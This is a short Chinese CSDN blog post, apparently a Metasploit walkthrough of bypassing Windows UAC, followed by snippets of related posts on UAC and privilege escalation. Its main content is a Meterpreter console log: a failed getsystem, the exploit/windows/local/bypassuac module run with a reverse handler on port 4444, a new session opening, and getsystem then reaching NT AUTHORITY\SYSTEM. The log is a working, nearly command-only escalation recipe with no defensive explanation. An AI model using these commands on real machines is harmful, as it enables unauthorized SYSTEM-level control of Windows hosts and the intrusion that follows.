关闭

Metasploit - bypassuac

749人阅读 评论(0) 收藏 举报
分类:

Download: checkpriv

Installation:
cp checkpriv.rb /opt/metasploit-framework/scripts/meterpreter/checkpriv.rb

meterpreter > run checkpriv
[*] Admin token: false
[*] Running as SYSTEM: false
[*] UAC Enabled: true
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
msf exploit(bypassuac) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set SESSION 3
SESSION => 3
msf exploit(bypassuac) > run

[*] Started reverse handler on 192.168.1.100:4444 
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (957486 bytes) to 192.168.1.100
[*] Meterpreter session 5 opened (192.168.1.100:4444 -> 192.168.1.100:53232) at 2015-11-17 14:48:09 +0000

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > run checkpriv
[*] Admin token: true
[*] Running as SYSTEM: true
[*] UAC Enabled: false
0
0
查看评论
发表评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场

PowerShell 另类提权,win10测试通过,已绕过UAC!

在乌云上看了一篇关于”非常规提权”的做法,试了一下,效果不错.装载过来,顺便加上自己的代码段. 简洁点写,省去大部分,需要阅读原文的请去:http://drops.wooyun.org/ti...
  • u010984277
  • u010984277
  • 2016-05-31 14:05
  • 5259

Matasploit扫描漏洞方法

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,密码审计,...
  • xixiruyiruyi
  • xixiruyiruyi
  • 2016-12-31 23:27
  • 3174

[Win32] UAC用户账户控制(提权+降权)

首先必须澄清一下:UAC不是Vista才有的东西!我反正知道XP就有了,2000不知道,XP上也有UAC,只不过默认没有开启,你要是愿意可以自己开启,只不过太不人性化了,和Linux上的switch ...
  • zuishikonghuan
  • zuishikonghuan
  • 2015-07-20 10:40
  • 5685

Metasploit内网实战篇,NAT环境+bypassUAC内存注入绕过+win7提权

Metasploit Pro 4.9版本auxiliary/pro/generate_dynamic_stager模块替换了之前的exploit/pro/windows/dynamic_exe 增加了...
  • kuangmang
  • kuangmang
  • 2014-06-05 16:00
  • 1290

Delphi与Windows 7下的用户账户控制(UAC)机制

WIN7/WIN8/WIN10, Vista提供的UAC机制,它的主要目的是防止对于操作系统本身的恶意修改。 对于Delphi程序的影响,UAC主要在于以下几点: 1、由于UAC机制,Delphi...
  • zisongjia
  • zisongjia
  • 2017-04-01 10:44
  • 458

程序跳过UAC研究及实现思路

网上很对跳过UAC资料都是说如果让UAC弹出窗体,并没有真正跳过弹窗,这里结合动态提权+计划任务实现真正意义上的跳过UAC弹窗,运行程序的时候可以不出现UAC窗体,并且程序还是以高权限运行。 vist...
  • daiafei
  • daiafei
  • 2013-12-26 11:44
  • 9373

冲出UAC-解决Win UAC问题的编程经验

感想关注 ,转载引用请注明 http://blog.csdn.net/leonwei/article/details/8905703       最近一直在搞页游版的端游移植,里面用到了很多...
  • leonwei
  • leonwei
  • 2013-05-09 15:46
  • 7417

[Windows]_[初级]_[应用程序避免弹出UAC授权窗口的方案]

场景 当Windows app以管理员模式启动时, 可以做一下管理员模式下的操作, 比如安装驱动, 扫描磁盘等. 可是自从vista 开始管理员模式启动关程序必然会弹出UAC对话框. 如果每启动一个需...
  • infoworld
  • infoworld
  • 2016-08-22 14:10
  • 990

Win7下运行VC程序UAC权限问题

在Win7运行VC程序往往受到UAC权限不够的问题,以下有几个方法获得管理员权限 1、通过代码提升用户权限,代码如下: BOOL UpgradeProcessPrivilege(HANDL...
  • educast
  • educast
  • 2013-08-17 13:58
  • 4744

Metasploit 整理笔记

一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被...
  • tan6600
  • tan6600
  • 2015-07-12 14:31
  • 5877
    安全书籍